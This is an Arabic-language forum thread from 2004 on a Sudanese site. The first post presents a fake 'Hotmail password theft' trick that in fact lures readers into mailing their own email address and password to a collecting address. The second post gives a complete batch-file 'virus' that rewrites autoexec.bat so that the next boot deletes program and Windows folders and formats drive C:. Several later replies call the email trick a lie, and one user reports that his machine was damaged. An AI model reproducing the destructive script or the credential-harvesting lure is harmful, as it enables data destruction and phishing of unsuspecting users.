Follow us Youtube Rss Twitter Facebook
قديم 08-31-2004, 01:36 AM   #1
برتاح ليك
عضو مشارك
 
تاريخ التسجيل: May 2004
الإقامة: السودان
المشاركات: 62
Thumbs up طريقه (سرقه ايميلات بدون تعب

ارجوكم ما تاذوني عشان ما اضركم
قام بعض الاشخاص بأختراق شركه الهوت ميل وهذه الطريقة لحصولك على كلمة السر لأي شخص على الهوت ميل من خلال موقع الهوت ميل نفسه وبعد المشاركة والارسال سيأتي لك ايمال فوري به كلمه السر للشخص المطلوب ..
الخطوة الاولى :
ارسل الاميل الى :- change_my_password@hotmai l.com
في مكان العنوان تكتب هذا العنوان (Subject) هذه الكلمه : PASSWORD TEST
الخطوه الثانية :
--- في داخل الاميل ---
في السطر الاول . تضع عنوان أميل الشخص الشخص لديه بالفعل عنوان على الهوت ميل) ( التأكد من اسم الأميل للشخص)
الخطوة الثالثة :
تترك فراغ ثلاثة سطور تماما بالضغط على مفتاح الادخال ( الانتر ).ً
الخطوة الرابعة :
في السطر الخامس . اكتب عنوان الأميل و كلمة السر التي تريد ان تتلقى عليه كلمة السر للشخص المطلوب . كما مبين
مثال على كل ما قيل :
to : : change_my_password@hotmai l.com
Subject : PASSWORD TEST
--- داخل الأميل---
هذا هو عنوان الشخص المطلوب معرفة كلمة السر الخاص بهjenne@ hot mail.com
مسافه أولى بالضغط على انتر
مسافه ثانيه بالضغط على انتر
مسافه ثالثه بالضعط على انتر
ثم بعدها- أميلك البريدي على الهوت ميل هناوالذي تريد تلقي الرد عليه - :
hugo@hotmail.com
- كلمة السر- natural
هذه الطريقة الامنية تستعمل لأختبار كلمة السر بعد تجديد موقع الهوت ميل .
أنها حقا رهيبة .!!!!!!!!!!!!!!!!!! وسيتم ارسال كلمة السر بعد التأكد من المعلومات الموجودةفي رساله خلال وقت قصير .
التوقيع
ان لم تذد شئا علي الدنيا**كنت انت زائدا عليها

للتعارف maazz_2005@hotmail
برتاح ليك غير متصل  
قديم 08-31-2004, 01:48 AM   #2
برتاح ليك
عضو مشارك
 
تاريخ التسجيل: May 2004
الإقامة: السودان
المشاركات: 62
Talking اصنع فيرس فى اقل من دقيقة للمبتدئين والمحترفين

اولا : روح علىNotebadاكتب :
echo off@

cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\************************s\command\format .com c:\ >nul >>c:\autoexec.bat
echo copy c:\************************s\command\deltre e.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\************************s\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat


خزن بصفة bat

واضغط save
و لنفرض حطاط الاسم جهاد

ولا تفتحوا
وضيفة الفايروس مسح كل شيء على الكومبيوتر
dazzler1.g dazzler1.g msh_msh_man dazzler1.g dazzler1.g
التوقيع
ان لم تذد شئا علي الدنيا**كنت انت زائدا عليها

للتعارف maazz_2005@hotmail
برتاح ليك غير متصل  
قديم 09-05-2004, 01:37 AM   #3
Black Staing
عضو فعال
 
تاريخ التسجيل: Aug 2003
الإقامة: الخرطوم
المشاركات: 486
اهلا اخوي...
طبعا عدد الزوار كبير لكن ولا رد للاسف الشديد

وانا اللى بقدر اقوله انه الموضوع ده اكبر كذبة
والايميل
change_my_password@hotmail.com
خاص لاحد الافراد
======
تاني حاجة لو شغلت عقلك حبة
هو داير بباسووردي شنو؟؟
=========
وطبعا ده زي قصة الايميل اللى برجع الباس المسروق
service_x@hotmail.com
مع انو الصح
servise_x@hotmail.com

فالايميلات دي بتاعت ناس عاملة ذكية
وفعلا الحكاية دي زمان كانت مجدية
لكن اليوم صارت مضحكة

تحياتي وارجو من الجميع المشاركة وابداء الراي
التوقيع
C++/C , Assembly Programmer
Qt Developer
GNU/Linux Programmer


sudancs.com
Black Staing غير متصل  
قديم 09-05-2004, 04:02 AM   #4
vampire0o0
عضو فعال
 
تاريخ التسجيل: May 2004
الإقامة: مدينة الحب،حي الشوق,تقاطع أموت فيك,عند لوحة أحبك
المشاركات: 508
اقتباس:
الرسالة الأصلية كتبت بواسطة Black Staing
اهلا اخوي...
طبعا عدد الزوار كبير لكن ولا رد للاسف الشديد

وانا اللى بقدر اقوله انه الموضوع ده اكبر كذبة
والايميل
change_my_password@hotmail.com
خاص لاحد الافراد
======
تاني حاجة لو شغلت عقلك حبة
هو داير بباسووردي شنو؟؟
=========
وطبعا ده زي قصة الايميل اللى برجع الباس المسروق
service_x@hotmail.com
مع انو الصح
servise_x@hotmail.com

فالايميلات دي بتاعت ناس عاملة ذكية
وفعلا الحكاية دي زمان كانت مجدية
لكن اليوم صارت مضحكة

تحياتي وارجو من الجميع المشاركة وابداء الراي
والله فعلا دي أكبر كذبه
وإذا كنت انته العامل الموضوع ده ياريد ما تظن إن الناس دي قاعده ساي
أما إذا كان (كوبي وبيست) ياريد تنتبه قبل نقل المواضيع
التوقيع
.@.°¨¨™¤¦.للتـــــــــــ.{maaoia2@hotmail.com}.ـعــــــارف.¦¤™¨¨°.@.

.@.°¨¨™¤¦.للتـــــــــــ.{maaoia2@hotmail.com}.ـعــــــارف.¦¤™¨¨°.@.
vampire0o0 غير متصل  
قديم 09-08-2004, 03:33 PM   #5
msab2004
عضو جديد
 
تاريخ التسجيل: Jul 2004
الإقامة: السودان
المشاركات: 33
معليش يعني يا خوانا الحصل حصل وما في مشكلة الجايت اكتر من الرايحات
التوقيع
قول الصدق كامل ارجوكا ما تجامل قولو قول كامل ياحبيبو ما تجامل قول الصدق كامل ارجوكا ما تجامل
msab2004 غير متصل  
قديم 09-10-2004, 12:04 AM   #6
قعقاع
Guest
 
المشاركات: n/a
يا جماعة مافيش داعي للغش والخداااااااااااع
الحركات دي بصراحة بتاعت مبتدئين وعبطة كمان...

--------------------------
اخ برتاح ليك
معليش لكن هذا الكود قديم وما للمحترفين انما ممكن يكون للمبتدئين جداً

-------------


قعقاع-- الهكر الاسلامي
منظمة الهاكرز السودانية
قسم الاختراق والبرمجة
مدير المنظمة
 
قديم 09-10-2004, 09:21 PM   #7
shogar_128
عضو مشارك
 
تاريخ التسجيل: Jun 2004
الإقامة: السودان
المشاركات: 145
كلام ساكت

دا كلام ساكت ما حتقدر تعمل اى حاجه
التوقيع
[move=up]
كود:
اقتباس:
شوقار
[/move]
shogar_128 غير متصل  
قديم 09-12-2004, 01:35 PM   #8
msab2004
عضو جديد
 
تاريخ التسجيل: Jul 2004
الإقامة: السودان
المشاركات: 33
السلام عليكم كيفكم يا شباب
يا shogar_128 ما تقلط علي برتاح ليك دا خبرتو في الهكر كثير
وزي ما بقول المثل اسال مجر ولا تسال طبيب
وانا جربت منو والله احترتة الزولدا عمل في جهازي شنو والله حتي الان ما قادر اصلح جهازي حتي الان لما غنعتا منو والله جبتليهو مهنديسين من وين وين والله ما عرفو ليهو
التوقيع
قول الصدق كامل ارجوكا ما تجامل قولو قول كامل ياحبيبو ما تجامل قول الصدق كامل ارجوكا ما تجامل
msab2004 غير متصل  
قديم 09-13-2004, 07:08 PM   #9
ابو كلام
عضو جديد
 
تاريخ التسجيل: Aug 2004
الإقامة: السودان
المشاركات: 5
Question والله الشغلانه ماظابطه

التوقيع
حنيـــــــــــــن
ابو كلام غير متصل  
قديم 09-19-2004, 11:15 PM   #10
برتاح ليك
عضو مشارك
 
تاريخ التسجيل: May 2004
الإقامة: السودان
المشاركات: 62
Wink ما تفهموني غلط

السلام عليكم

يا اخوانا ما تفهموني غلط والله كل الموضوع اني كنت عاوز اختبركم والموضوع دا انا لقيتو في منتدي اخر واستقربت لي ترحيب الناس ليهو
قلت انقلو واشوف ردكم كيف واقسم با الله انو الايميل دا ما بتاعي ولا بعرفو
التوقيع
ان لم تذد شئا علي الدنيا**كنت انت زائدا عليها

للتعارف maazz_2005@hotmail
برتاح ليك غير متصل  
قديم 09-20-2004, 12:24 AM   #11
Sad Bird
عضو جيّد
 
تاريخ التسجيل: Jun 2003
الإقامة: EgYpT
المشاركات: 933
اكبر كذبه يا جماعه مفيش حد يصدق الكلام دة انا قولتكم اهو وكلامvampire0o0 هو الصحححححححححححححح
التوقيع

***********************
****************************
أشتقت اٍلى أنفاسك
أشتقت إلى عطرك
أشتقت إلى دفاك
أشتقت إليك
كشوق الليل
إلى الأشراق
أنظر إلى عينيك
لأتامل تلك الأحداق
التي أتعبتني
أهواك
بلهفة المشتاق
Sad Bird غير متصل  
 

أدوات الموضوع
انواع عرض الموضوع

ضوابط المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع


الساعة الآن 12:57 PM.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc. Trans by
Protected by CBACK.de CrackerTracker